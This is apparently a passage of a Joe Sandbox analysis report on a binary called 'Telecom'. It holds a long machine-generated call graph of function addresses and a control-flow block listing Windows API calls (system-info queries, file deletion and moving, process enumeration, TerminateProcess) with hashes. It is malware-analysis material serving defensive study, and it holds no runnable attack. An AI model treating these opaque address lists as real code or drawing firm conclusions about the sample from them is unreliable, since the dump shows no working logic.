448d71 98995->99002 99003 48696e 98995->99003 98998 4868bc 98996->98998 98999 48687d 98996->98999 98997 448844 8 API calls 98997->99004 99009 448470 8 API calls 98998->99009 99008 448470 8 API calls 98999->99008 99000->98990 99001 448e71 99001->98711 99010 448470 8 API calls 99002->99010 99007 448470 8 API calls 99003->99007 99004->98997 99004->99001 99006 44893c 8 API calls 99004->99006 99017 448a60 8 API calls 99004->99017 99005->98990 99005->98991 99039 448d91 try_get_first_available_module 99005->99039 99006->99004 99012 48697b 99007->99012 99013 486885 99008->99013 99014 4868c5 99009->99014 99011 448d79 99010->99011 99016 44bd57 8 API calls 99011->99016 99018 448a60 8 API calls 99012->99018 99019 448ec0 52 API calls 99013->99019 99015 448a60 8 API calls 99014->99015 99021 4868e1 99015->99021 99016->99039 99017->99004 99018->99039 99020 486897 99019->99020 99022 448844 8 API calls 99020->99022 99025 448ec0 52 API calls 99021->99025 99023 4868ab 99022->99023 99026 44893c 8 API calls 99023->99026 99024 448844 8 API calls 99024->99039 99028 4868fc 99025->99028 99029 4868b9 99026->99029 99027 44893c 8 API calls 99027->99039 99030 448844 8 API calls 99028->99030 99037 448a60 8 API calls 99029->99037 99036 486910 99030->99036 99031 4869c1 99032 4869f1 99031->99032 99033 4869e5 99031->99033 99035 44893c 8 API calls 99032->99035 99672 44ad40 8 API calls __fread_nolock 99033->99672 99034 448a60 8 API calls 99034->99039 99040 4869ff 99035->99040 99041 44893c 8 API calls 99036->99041 99037->99001 99039->99001 99039->99024 99039->99027 99039->99031 99039->99034 99043 448a60 8 API calls 99040->99043 99041->99029 99042 4869ef 99044 486a12 99043->99044 99045 44bd57 8 API calls 99044->99045 99045->99042 99047 4c7b38 99046->99047 99048 4c7b52 99046->99048 99680 4b3fe1 81 API calls __wsopen_s 99047->99680 99673 4c60e6 99048->99673 99052 450340 242 API calls 99053 4c7bc1 99052->99053 99054 4c7c5c 99053->99054 99055 4c7c03 99053->99055 99058 4c7b4a 99053->99058 99056 4c7cb0 99054->99056 99057 4c7c62 99054->99057 99064 4b148b 8 API calls 99055->99064 99056->99058 99059 448ec0 52 API calls 99056->99059 99681 4b1ad8 8 API calls 99057->99681 99058->98673 99060 4c7cc2 99059->99060 99062 44c2c9 8 API calls 99060->99062 99065 4c7ce6 CharUpperBuffW 99062->99065 99063 4c7c85 99682 44bd07 8 API calls 99063->99682 99067 4c7c3b 99064->99067 99069 4c7d00 99065->99069 99068 452b20 242 API calls 99067->99068 99068->99058 99070 4c7d07 99069->99070 99071 4c7d53 99069->99071 99075 4b148b 8 API calls 99070->99075 99072 448ec0 52 API calls 99071->99072 99073 4c7d5b 99072->99073 99683 45aa65 9 API calls 99073->99683 99076 4c7d35 99075->99076 99077 452b20 242 API calls 99076->99077 99077->99058 99078 4c7d65 99078->99058 99079 448ec0 52 API calls 99078->99079 99080 4c7d80 99079->99080 99684 44bd07 8 API calls 99080->99684 99082->98714 99083->98671 99084->98681 99085->98685 99086->98691 99087->98691 99088->98709 99089->98709 99090->98709 99091->98705 99092->98709 99130 4b02aa 99093->99130 99096 4b040b 99099 4b0471 99096->99099 99100 4b041b 99096->99100 99097 4b03f3 99146 4b05e9 56 API calls __fread_nolock 99097->99146 99101 4b04a1 99099->99101 99102 4b0507 99099->99102 99113 4b0399 __fread_nolock 99099->99113 99124 4b0453 99100->99124 99147 4b2855 99100->99147 99105 4b04d1 99101->99105 99106 4b04a6 99101->99106 99103 4b05b0 99102->99103 99104 4b0510 99102->99104 99103->99113 99156 44c63f 39 API calls 99103->99156 99107 4b058d 99104->99107 99108 4b0515 99104->99108 99105->99113 99152 44ca5b 39 API calls 99105->99152 99106->99113 99151 44ca5b 39 API calls 99106->99151 99107->99113 99155 44c63f 39 API calls 99107->99155 99110 4b051b 99108->99110 99111 4b0554 99108->99111 99110->99113 99153 44c63f 39 API calls 99110->99153 99111->99113 99154 44c63f 39 API calls 99111->99154 99112 4b0427 99121 4b2855 10 API calls 99112->99121 99113->98748 99122 4b043e __fread_nolock 99121->99122 99123 4b2855 10 API calls 99122->99123 99123->99124 99137 4b1844 99124->99137 99126 44c99e 99125->99126 99127 44c9a5 99125->99127 99126->99127 99185 466641 39 API calls _strftime 99126->99185 99127->98746 99129 44c9e8 99129->98746 99131 4b02f7 99130->99131 99136 4b02bb 99130->99136 99132 44c98d 39 API calls 99131->99132 99133 4b02f5 99132->99133 99133->99096 99133->99097 99133->99113 99135 464d98 _strftime 40 API calls 99135->99136 99136->99133 99136->99135 99157 448ec0 99136->99157 99138 4b184f 99137->99138 99139 46014b 8 API calls 99138->99139 99140 4b1856 99139->99140 99141 4b1883 99140->99141 99142 4b1862 99140->99142 99144 46017b 8 API calls 99141->99144 99143 46017b 8 API calls 99142->99143 99145 4b186b ___scrt_fastfail 99143->99145 99144->99145 99145->99113 99146->99113 99148 4b285e 99147->99148 99149 4b2863 99147->99149 99184 4b1926 10 API calls __fread_nolock 99148->99184 99149->99112 99151->99113 99152->99113 99153->99113 99154->99113 99155->99113 99156->99113 99158 448ed5 99157->99158 99175 448ed2 99157->99175 99159 448edd 99158->99159 99160 448f0b 99158->99160 99180 465536 26 API calls 99159->99180 99163 486a38 99160->99163 99164 448f1d 99160->99164 99171 486b1f 99160->99171 99165 486ab1 99163->99165 99174 46017b 8 API calls 99163->99174 99181 45fe6f 51 API calls 99164->99181 99182 45fe6f 51 API calls 99165->99182 99166 486b37 99166->99166 99169 46014b 8 API calls 99172 448ef7 99169->99172 99170 448eed 99170->99169 99183 4654f3 26 API calls 99171->99183 99173 44b329 8 API calls 99172->99173 99173->99175 99176 486a81 99174->99176 99175->99136 99177 46014b 8 API calls 99176->99177 99178 486aa8 99177->99178 99179 44b329 8 API calls 99178->99179 99179->99165 99180->99170 99181->99170 99182->99171 99183->99166 99184->99149 99185->99129 99187 4858b9 99186->99187 99188 446c13 99186->99188 99189 4858ca 99187->99189 99191 448577 8 API calls 99187->99191 99193 46014b 8 API calls 99188->99193 99190 44bd57 8 API calls 99189->99190 99192 4858d4 99190->99192 99191->99189 99192->99192 99194 446c26 99193->99194 99195 446c41 99194->99195 99196 446c2f 99194->99196 99198 44bf73 8 API calls 99195->99198 99197 44b329 8 API calls 99196->99197 99199 446c37 99197->99199 99198->99199 99199->98752 99199->98756 99201 45c04d 99200->99201 99202 45c089 99200->99202 99201->99202 99204 45c05c 99201->99204 99203 44bd57 8 API calls 99202->99203 99213 4ad396 99203->99213 99205 45c071 99204->99205 99206 45c07e 99204->99206 99223 45c08f 99205->99223 99230 4ad49d 12 API calls 99206->99230 99209 45c07a 99209->98789 99211 4ad3c5 99211->98789 99213->99211 99231 4ad334 ReadFile SetFilePointerEx 99213->99231 99232 44ad40 8 API calls __fread_nolock 99213->99232 99215 447b26 99214->99215 99216 447b5f 99214->99216 99219 46014b 8 API calls 99215->99219 99217 447b39 99216->99217 99218 44bed9 8 API calls 99216->99218 99217->98797 99218->99217 99219->99217 99220->98798 99221->98756 99222->98756 99233 45c277 99223->99233 99228 4487c8 10 API calls 99229 45c0c2 99228->99229 99229->99209 99230->99209 99231->99213 99232->99213 99234 46017b 8 API calls 99233->99234 99235 45c28e 99234->99235 99236 46014b 8 API calls 99235->99236 99237 45c0a7 99236->99237 99238 44ae9b 99237->99238 99244 45fe8a 99238->99244 99240 44aee1 99240->99228 99240->99229 99241 44b120 2 API calls 99242 44aeac 99241->99242 99242->99240 99242->99241 99251 44b1b3 8 API calls __fread_nolock 99242->99251 99245 49fe73 99244->99245 99246 45fe9b 99244->99246 99247 46014b 8 API calls 99245->99247 99246->99242 99248 49fe7d 99247->99248 99249 46017b 8 API calls 99248->99249 99250 49fe92 99249->99250 99251->99242 99253 4b18b6 99252->99253 99254 46014b 8 API calls 99253->99254 99255 4b18bd 99254->99255 99258 4afcb5 99255->99258 99257 4b18f7 99257->98809 99259 44c2c9 8 API calls 99258->99259 99260 4afcc8 CharLowerBuffW 99259->99260 99262 4afcdb 99260->99262 99261 44655e 8 API calls 99261->99262 99262->99261 99263 4afce5 ___scrt_fastfail 99262->99263 99264 4afd19 99262->99264 99263->99257 99265 44655e 8 API calls 99264->99265 99267 4afd2b 99264->99267 99265->99267 99266 46017b 8 API calls 99272 4afd59 99266->99272 99267->99266 99268 4afd7b 99276 4afe0c 99268->99276 99271 4afdb8 99271->99263 99273 46014b 8 API calls 99271->99273 99272->99268 99291 4afbed 8 API calls 99272->99291 99274 4afdd2 99273->99274 99275 46017b 8 API calls 99274->99275 99275->99263 99277 44bf73 8 API calls 99276->99277 99278 4afe3e 99277->99278 99279 44bf73 8 API calls 99278->99279 99280 4afe47 99279->99280 99281 44bf73 8 API calls 99280->99281 99288 4afe50 99281->99288 99282 448577 8 API calls 99282->99288 99283 4666f8 GetStringTypeW 99283->99288 99285 466641 39 API calls 99285->99288 99286 4afe0c 40 API calls 99286->99288 99287 44ad40 8 API calls 99287->99288 99288->99282 99288->99283 99288->99285 99288->99286 99288->99287 99289 4b0114 99288->99289 99290 44bed9 8 API calls 99288->99290 99292 466722 GetStringTypeW _strftime 99288->99292 99289->99271 99290->99288 99291->99272 99292->99288 99294 448ec0 52 API calls 99293->99294 99295 4c89ed 99294->99295 99321 4c8a32 ISource 99295->99321 99331 4c9730 99295->99331 99297 4c8cde 99298 4c8eac 99297->99298 99302 4c8cec 99297->99302 99370 4c9941 59 API calls 99298->99370 99301 4c8ebb 99301->99302 99303 4c8ec7 99301->99303 99344 4c88e3 99302->99344 99303->99321 99304 448ec0 52 API calls 99320 4c8aa6 99304->99320 99309 4c8d25 99358 45ffe0 99309->99358 99312 4c8d5f 99315 447e12 8 API calls 99312->99315 99313 4c8d45 99365 4b3fe1 81 API calls __wsopen_s 99313->99365 99317 4c8d6e 99315->99317 99316 4c8d50 GetCurrentProcess TerminateProcess 99316->99312 99318 448470 8 API calls 99317->99318 99319 4c8d87 99318->99319 99330 4c8daf 99319->99330 99366 451ca0 8 API calls 99319->99366 99320->99297 99320->99304 99320->99321 99363 4a4ad3 8 API calls __fread_nolock 99320->99363 99364 4c8f7a 41 API calls _strftime 99320->99364 99321->98812 99323 4c8f22 99323->99321 99325 4c8f36 FreeLibrary 99323->99325 99324 4c8d9e 99367 4c95d8 74 API calls 99324->99367 99325->99321 99330->99323 99368 451ca0 8 API calls 99330->99368 99369 44b4c8 8 API calls 99330->99369 99371 4c95d8 74 API calls 99330->99371 99332 44c2c9 8 API calls 99331->99332 99333 4c974b CharLowerBuffW 99332->99333 99372 4a9805 99333->99372 99337 44bf73 8 API calls 99338 4c9787 99337->99338 99339 44acc0 8 API calls 99338->99339 99340 4c979b 99339->99340 99341 44adf4 8 API calls 99340->99341 99343 4c97a5 _wcslen 99341->99343 99342 4c98bb _wcslen 99342->99320 99343->99342 99379 4c8f7a 41 API calls _strftime 99343->99379 99345 4c88fe 99344->99345 99349 4c8949 99344->99349 99346 46017b 8 API calls 99345->99346 99348 4c8920 99346->99348 99347 46014b 8 API calls 99347->99348 99348->99347 99348->99349 99350 4c9af3 99349->99350 99351 4c9d08 ISource 99350->99351 99357 4c9b17 _strcat _wcslen ___std_exception_copy 99350->99357 99351->99309 99352 44c63f 39 API calls 99352->99357 99353 44c98d 39 API calls 99353->99357 99354 44ca5b 39 API calls 99354->99357 99355 448ec0 52 API calls 99355->99357 99357->99351 99357->99352 99357->99353 99357->99354 99357->99355 99380 4af8c5 10 API calls _wcslen 99357->99380 99359 45fff5 99358->99359 99360 46008d TerminateProcess 99359->99360 99361 46007b FindCloseChangeNotification 99359->99361 99362 46005b 99359->99362 99360->99362 99361->99362 99362->99312 99362->99313 99363->99320 99364->99320 99365->99316 99366->99324 99367->99330 99368->99330 99369->99330 99370->99301 99371->99330 99374 4a9825 _wcslen 99372->99374 99373 4a9914 99373->99337 99373->99343 99374->99373 99375 4a985a 99374->99375 99376 4a9919 99374->99376 99375->99373 99377 45e36b 41 API calls 99375->99377 99376->99373 99378 45e36b 41 API calls 99376->99378 99377->99375 99378->99376 99379->99342 99380->99357 99382 44bf73 8 API calls 99381->99382 99383 4ad93e 99382->99383 99384 44bf73 8 API calls 99383->99384 99385 4ad946 99384->99385 99386 44bf73 8 API calls 99385->99386 99387 4ad94e 99386->99387 99388 445851 9 API calls 99387->99388 99389 4ad958 99388->99389 99390 445851 9 API calls 99389->99390 99391 4ad962 99390->99391 99436 4aea43 99391->99436 99393 4ad96d 99447 4aeab0 GetFileAttributesW 99393->99447 99396 4ad98a 99398 4aeab0 GetFileAttributesW 99396->99398 99397 446b7c 8 API calls 99397->99396 99399 4ad992 99398->99399 99400 4ad99f 99399->99400 99401 446b7c 8 API calls 99399->99401 99402 44bf73 8 API calls 99400->99402 99401->99400 99403 4ad9a7 99402->99403 99404 44bf73 8 API calls 99403->99404 99405 4ad9af 99404->99405 99406 44568e 8 API calls 99405->99406 99407 4ad9c0 FindFirstFileW 99406->99407 99408 4adb0e FindClose 99407->99408 99420 4ad9e3 99407->99420 99412 4adb0c 99408->99412 99409 4adada FindNextFileW 99409->99420 99410 44b329 8 API calls 99410->99420 99412->98826 99413 447bb5 8 API calls 99413->99420 99414 446b7c 8 API calls 99414->99420 99415 4add79 4 API calls 99415->99420 99416 4ada6f 99419 45e36b 41 API calls 99416->99419 99421 4ada98 MoveFileW 99416->99421 99422 4ada88 DeleteFileW 99416->99422 99417 4adafd FindClose 99417->99412 99418 4adb47 CopyFileExW 99418->99420 99419->99416 99420->99408 99420->99409 99420->99410 99420->99413 99420->99414 99420->99415 99420->99416 99420->99417 99420->99418 99423 4adab5 DeleteFileW 99420->99423 99449 4ae070 99420->99449 99421->99420 99422->99420 99423->99420 99425 4455dc 8 API calls 99424->99425 99426 4adba1 GetFileAttributesW 99425->99426 99427 4adbb5 GetLastError 99426->99427 99435 4adbce 99426->99435 99428 4adbc2 CreateDirectoryW 99427->99428 99429 4adbd0 99427->99429 99428->99429 99428->99435 99430 44adf4 8 API calls 99429->99430 99429->99435 99431 4adc12 99430->99431 99432 4adb6c 8 API calls 99431->99432 99433 4adc1b 99432->99433 99434 4adc1f CreateDirectoryW 99433->99434 99433->99435 99434->99435 99435->98835 99437 44bf73 8 API calls 99436->99437 99438 4aea58 99437->99438 99439 44bf73 8 API calls 99438->99439 99440 4aea60 99439->99440 99441 44568e 8 API calls 99440->99441 99442 4aea6f 99441->99442 99443 44568e 8 API calls 99442->99443 99444 4aea7f 99443->99444 99445 45e36b 41 API calls 99444->99445 99446 4aea94 99445->99446 99446->99393 99448 4ad978 99447->99448 99448->99396 99448->99397 99450 4ae08c 99449->99450 99451 4ae091 99450->99451 99452 4ae0a7 99450->99452 99454 44bed9 8 API calls 99451->99454 99502 4ae0a2 99451->99502 99453 44bf73 8 API calls 99452->99453 99455 4ae0af 99453->99455 99454->99502 99456 44bf73 8 API calls 99455->99456 99457 4ae0b7 99456->99457 99458 44bf73 8 API calls 99457->99458 99459 4ae0c2 99458->99459 99460 44bf73 8 API calls 99459->99460 99461 4ae0ca 99460->99461 99462 44bf73 8 API calls 99461->99462 99463 4ae0d2 99462->99463 99464 44bf73 8 API calls 99463->99464 99465 4ae0da 99464->99465 99466 44bf73 8 API calls 99465->99466 99467 4ae0e2 99466->99467 99468 44bf73 8 API calls 99467->99468 99469 4ae0ea 99468->99469 99470 44568e 8 API calls 99469->99470 99471 4ae101 99470->99471 99472 44568e 8 API calls 99471->99472 99473 4ae11a 99472->99473 99474 44655e 8 API calls 99473->99474 99475 4ae126 99474->99475 99476 4ae139 99475->99476 99477 44adf4 8 API calls 99475->99477 99478 44655e 8 API calls 99476->99478 99477->99476 99479 4ae142 99478->99479 99480 4ae152 99479->99480 99481 44adf4 8 API calls 99479->99481 99482 4ae164 99480->99482 99483 44bed9 8 API calls 99480->99483 99481->99480 99484 447bb5 8 API calls 99482->99484 99483->99482 99485 4ae16f 99484->99485 99503 4ae22c 8 API calls 99485->99503 99487 4ae17e 99504 4ae22c 8 API calls 99487->99504 99489 4ae191 99490 44655e 8 API calls 99489->99490 99491 4ae19b 99490->99491 99492 4ae1b2 99491->99492 99493 4ae1a0 99491->99493 99495 44655e 8 API calls 99492->99495 99494 446b7c 8 API calls 99493->99494 99496 4ae1ad 99494->99496 99497 4ae1bb 99495->99497 99501 447bb5 8 API calls 99496->99501 99498 4ae1d9 99497->99498 99500 446b7c 8 API calls 99497->99500 99499 447bb5 8 API calls 99498->99499 99499->99502 99500->99496 99501->99498 99502->99420 99503->99487 99504->99489 99506 44bf73 8 API calls 99505->99506 99507 4adc73 99506->99507 99508 44bf73 8 API calls 99507->99508 99509 4adc7c 99508->99509 99510 44bf73 8 API calls 99509->99510 99511 4adc85 99510->99511 99512 445851 9 API calls 99511->99512 99513 4adc90 99512->99513 99514 4aeab0 GetFileAttributesW 99513->99514 99515 4adc99 99514->99515 99516 4adcab 99515->99516 99517 446b7c 8 API calls 99515->99517 99518 44568e 8 API calls 99516->99518 99517->99516 99519 4adcbf FindFirstFileW 99518->99519 99520 4add4b FindClose 99519->99520 99521 4adcde 99519->99521 99522 4add56 99520->99522 99521->99520 99523 4adce2 99521->99523 99522->98847 99523->99521 99524 4add26 FindNextFileW 99523->99524 99525 44bed9 8 API calls 99523->99525 99526 447bb5 8 API calls 99523->99526 99527 446b7c 8 API calls 99523->99527 99524->99521 99524->99523 99525->99523 99526->99523 99528 4add17 DeleteFileW 99527->99528 99528->99524 99529 4add42 FindClose 99528->99529 99529->99522 99540 4ae80e 99530->99540 99532 4ade86 FindCloseChangeNotification 99532->98861 99533 4addd4 Process32NextW 99533->99532 99534 4addcd 99533->99534 99534->99532 99534->99533 99535 44bf73 8 API calls 99534->99535 99536 44b329 8 API calls 99534->99536 99537 44568e 8 API calls 99534->99537 99538 447bb5 8 API calls 99534->99538 99539 45e36b 41 API calls 99534->99539 99535->99534 99536->99534 99537->99534 99538->99534 99539->99534 99541 4ae819 99540->99541 99542 4ae830 99541->99542 99545 4ae836 99541->99545 99546 466722 GetStringTypeW _strftime 99541->99546 99547 46666b 39 API calls _strftime 99542->99547 99545->99534 99546->99541 99547->99545 99549 4ba42d 99548->99549 99550 4ba347 99548->99550 99619 4ba6ef 39 API calls 99549->99619 99551 46014b 8 API calls 99550->99551 99553 4ba34e 99551->99553 99554 46017b 8 API calls 99553->99554 99556 4ba35f 99554->99556 99555 4ba40f 99555->98864 99558 447aab FindCloseChangeNotification 99556->99558 99557 4ba50a 99560 4b2855 10 API calls 99557->99560 99559 4ba36a 99558->99559 99563 44bf73 8 API calls 99559->99563 99561 4ba511 99560->99561 99568 4ad5aa 4 API calls 99561->99568 99562 4ba3e7 99562->99555 99562->99557 99564 4ba478 99562->99564 99565 4ba372 99563->99565 99566 448ec0 52 API calls 99564->99566 99567 447aab FindCloseChangeNotification 99565->99567 99582 4ba47f 99566->99582 99569 4ba379 99567->99569 99593 4ba4ed 99568->99593 99571 448ec0 52 API calls 99569->99571 99570 4ba500 99599 4ad602 99570->99599 99574 4ba385 99571->99574 99572 4ba4b3 99575 447ad5 8 API calls 99572->99575 99576 447aab FindCloseChangeNotification 99574->99576 99577 4ba4c3 99575->99577 99578 4ba38f 99576->99578 99580 4ba4d3 99577->99580 99584 44bed9 8 API calls 99577->99584 99581 446fa2 5 API calls 99578->99581 99579 447aab FindCloseChangeNotification 99583 4ba563 99579->99583 99586 446b7c 8 API calls 99580->99586 99585 4ba39e 99581->99585 99582->99570 99582->99572 99620 447a7b FindCloseChangeNotification ISource 99583->99620 99584->99580 99588 4ba3a2 99585->99588 99589 4ba407 99585->99589 99590 4ba4e1 99586->99590 99594 446c5f 13 API calls 99588->99594 99618 447a7b FindCloseChangeNotification ISource 99589->99618 99592 4ad602 16 API calls 99590->99592 99592->99593 99593->99555 99593->99579 99595 4ba3b0 99594->99595 99596 446c48 3 API calls 99595->99596 99597 4ba3b7 99596->99597 99597->99562 99598 4ad5aa 4 API calls 99597->99598 99598->99562 99600 4ad679 99599->99600 99601 4ad615 99599->99601 99602 4ad5aa 4 API calls 99600->99602 99601->99600 99603 4ad61a 99601->99603 99617 4ad661 99602->99617 99604 4ad66d 99603->99604 99605 4ad624 99603->99605 99645 4ad697 12 API calls ISource 99604->99645 99607 4ad643 99605->99607 99609 4ad62e 99605->99609 99621 45c1f6 99607->99621 99611 45c1f6 8 API calls 99609->99611 99612 4ad636 99611->99612 99637 45f9d4 WideCharToMultiByte 99612->99637 99615 4ad641 99634 4ad5e6 99615->99634 99617->99593 99618->99555 99619->99562 99620->99555 99622 46017b 8 API calls 99621->99622 99623 45c209 99622->99623 99624 46014b 8 API calls 99623->99624 99625 45c215 99624->99625 99626 4ad538 WideCharToMultiByte 99625->99626 99627 4ad56f 99626->99627 99628 4ad566 99626->99628 99629 46017b 8 API calls 99627->99629 99630 45fe8a 8 API calls 99628->99630 99631 4ad576 WideCharToMultiByte 99629->99631 99633 4ad56d 99630->99633 99646 45fa3e 99631->99646 99633->99615 99635 4ad5aa 4 API calls 99634->99635 99636 4ad5f8 99635->99636 99636->99617 99638 45fa35 99637->99638 99639 45f9fe 99637->99639 99641 45fe8a 8 API calls 99638->99641 99640 46017b 8 API calls 99639->99640 99642 45fa05 WideCharToMultiByte 99640->99642 99644 45fa29 99641->99644 99643 45fa3e 8 API calls 99642->99643 99643->99644 99644->99615 99645->99617 99647 45fa4c 99646->99647 99648 45fa8a 99646->99648 99647->99648 99650 45fa57 99647->99650 99663 4ad306 8 API calls __fread_nolock 99648->99663 99651 45fa65 99650->99651 99652 49fb42 99650->99652 99659 45fa93 99651->99659 99654 46014b 8 API calls 99652->99654 99656 49fb4c 99654->99656 99655 45fa6d __fread_nolock 99655->99633 99657 46017b 8 API calls 99656->99657 99658 49fb71 99657->99658 99660 45faa5 99659->99660 99662 45fac1 99659->99662 99661 46017b 8 API calls 99660->99661 99661->99662 99662->99655 99663->99655 99665 4ae490 GetFileAttributesW 99664->99665 99666 4add80 99664->99666 99665->99666 99667 4ae49c FindFirstFileW 99665->99667 99666->98711 99667->99666 99668 4ae4ad FindClose 99667->99668 99668->99666 99669->98950 99670->98950 99671->98967 99672->99042 99674 4c6101 99673->99674 99679 4c614f 99673->99679 99675 46017b 8 API calls 99674->99675 99677 4c6123 99675->99677 99676 46014b 8 API calls 99676->99677 99677->99676 99677->99679 99685 4b1400 8 API calls 99677->99685 99679->99052 99680->99058 99681->99063 99682->99058 99683->99078 99684->99058 99685->99677 99686 4515ff 99687 45e3d5 8 API calls 99686->99687 99688 451615 99687->99688 99693 45e439 99688->99693 99690 45163f 99705 4b3fe1 81 API calls __wsopen_s 99690->99705 99692 496207 99694 447ad5 8 API calls 99693->99694 99695 45e470 99694->99695 99696 44b329 8 API calls 99695->99696 99698 45e4a1 99695->99698 99697 49e53e 99696->99697 99699 447bb5 8 API calls 99697->99699 99698->99690 99700 49e549 99699->99700 99706 45e7c1 39 API calls 99700->99706 99702 49e55c 99704 49e560 99702->99704 99707 44b4c8 8 API calls 99702->99707 99704->99704 99705->99692 99706->99702 99707->99704 99708 441098 99713 445fc8 99708->99713 99712 4410a7 99714 44bf73 8 API calls 99713->99714 99715 445fdf GetVersionExW 99714->99715 99716 448577 8 API calls 99715->99716 99717 44602c 99716->99717 99718 44adf4 8 API calls 99717->99718 99732 446062 99717->99732 99719 446056 99718->99719 99721 4455dc 8 API calls 99719->99721 99720 44611c GetCurrentProcess IsWow64Process 99722 446138 99720->99722 99721->99732 99723 485269 GetSystemInfo 99722->99723 99724 446150 LoadLibraryA 99722->99724 99725 446161 GetProcAddress 99724->99725 99726 44619d GetSystemInfo 99724->99726 99725->99726 99729 446171 GetNativeSystemInfo 99725->99729 99727 446177 99726->99727 99730 44109d 99727->99730 99731 44617b FreeLibrary 99727->99731 99728 485224 99729->99727 99733 460413 29 API calls __onexit 99730->99733 99731->99730 99732->99720 99732->99728 99733->99712 99734 49e737 99735 49e6e4 99734->99735 99738 4ae83e SHGetFolderPathW 99735->99738 99739 448577 8 API calls 99738->99739 99740 49e6ed 99739->99740 99741 44105b 99746 4452a7 99741->99746 99743 44106a 99777 460413 29 API calls __onexit 99743->99777 99745 441074 99747 4452b7 __wsopen_s 99746->99747 99748 44bf73 8 API calls 99747->99748 99749 44536d 99748->99749 99750 445594 10 API calls 99749->99750 99751 445376 99750->99751 99778 445238 99751->99778 99754 446b7c 8 API calls 99755 44538f 99754->99755 99756 446a7c 8 API calls 99755->99756 99757 44539e 99756->99757 99758 44bf73 8 API calls 99757->99758 99759 4453a7 99758->99759 99760 44bd57 8 API calls 99759->99760 99761 4453b0 RegOpenKeyExW 99760->99761 99762 484be6 RegQueryValueExW 99761->99762 99766 4453d2 99761->99766 99763 484c7c RegCloseKey 99762->99763 99764 484c03 99762->99764 99763->99766 99776 484c8e _wcslen 99763->99776 99765 46017b 8 API calls 99764->99765 99767 484c1c 99765->99767 99766->99743 99768 44423c 8 API calls 99767->99768 99769 484c27 RegQueryValueExW 99768->99769 99770 484c44 99769->99770 99773 484c5e ISource 99769->99773 99772 448577 8 API calls 99770->99772 99771 44655e 8 API calls 99771->99776 99772->99773 99773->99763 99774 44b329 8 API calls 99774->99776 99775 446a7c 8 API calls 99775->99776 99776->99766 99776->99771 99776->99774 99776->99775 99777->99745 99779 4822d0 __wsopen_s 99778->99779 99780 445245 GetFullPathNameW 99779->99780 99781 445267 99780->99781 99782 448577 8 API calls 99781->99782 99783 445285 99782->99783 99783->99754

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 339 445fc8-446037 call 44bf73 GetVersionExW call 448577 344 48507d-485090 339->344 345 44603d 339->345 346 485091-485095 344->346 347 44603f-446041 345->347 348 485098-4850a4 346->348 349 485097 346->349 350 446047-4460a6 call 44adf4 call 4455dc 347->350 351 4850bc 347->351 348->346 352 4850a6-4850a8 348->352 349->348 364 4460ac-4460ae 350->364 365 485224-48522b 350->365 355 4850c3-4850cf 351->355 352->347 354 4850ae-4850b5 352->354 354->344 357 4850b7 354->357 358 44611c-446136 GetCurrentProcess IsWow64Process 355->358 357->351 360 446195-44619b 358->360 361 446138 358->361 363 44613e-44614a 360->363 361->363 370 485269-48526d GetSystemInfo 363->370 371 446150-44615f LoadLibraryA 363->371 366 4460b4-4460b7 364->366 367 485125-485138 364->367 368 48524b-48524e 365->368 369 48522d 365->369 366->358 372 4460b9-4460f5 366->372 373 48513a-485143 367->373 374 485161-485163 367->374 376 485239-485241 368->376 377 485250-48525f 368->377 375 485233 369->375 378 446161-44616f GetProcAddress 371->378 379 44619d-4461a7 GetSystemInfo 371->379 372->358 381 4460f7-4460fa 372->381 382 485150-48515c 373->382 383 485145-48514b 373->383 384 485198-48519b 374->384 385 485165-48517a 374->385 375->376 376->368 377->375 386 485261-485267 377->386 378->379 387 446171-446175 GetNativeSystemInfo 378->387 380 446177-446179 379->380 394 446182-446194 380->394 395 44617b-44617c FreeLibrary 380->395 388 446100-44610a 381->388 389 4850d4-4850e4 381->389 382->358 383->358 392 48519d-4851b8 384->392 393 4851d6-4851d9 384->393 390 48517c-485182 385->390 391 485187-485193 385->391 386->376 387->380 388->355 396 446110-446116 388->396 399 4850e6-4850f2 389->399 400 4850f7-485101 389->400 390->358 391->358 397 4851ba-4851c0 392->397 398 4851c5-4851d1 392->398 393->358 401 4851df-485206 393->401 395->394 396->358 397->358 398->358 399->358 402 485103-48510f 400->402 403 485114-485120 400->403 404 485208-48520e 401->404 405 485213-48521f 401->405 402->358 403->358 404->358 405->358
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00445FF7
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                      • GetCurrentProcess.KERNEL32(?,004DDC2C,00000000,?,?), ref: 00446123
                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 0044612A
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00446155
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00446167
                                                      • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00446175
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0044617C
                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 004461A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                      • API String ID: 3290436268-3101561225
                                                      • Opcode ID: 650fadbce65ae0de30aa456732fe847067561234d4121f5194a4953d47e13c21
                                                      • Instruction ID: b85aec31d2807949d65ff8512a5dc1c0563e12e753069cf9870c0a5cea187d58
                                                      • Opcode Fuzzy Hash: 650fadbce65ae0de30aa456732fe847067561234d4121f5194a4953d47e13c21
                                                      • Instruction Fuzzy Hash: 66A18F2680A2C4CFD716DB687C451D97FA46B37300F28CC9BD4A497222C62D456DEB3A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

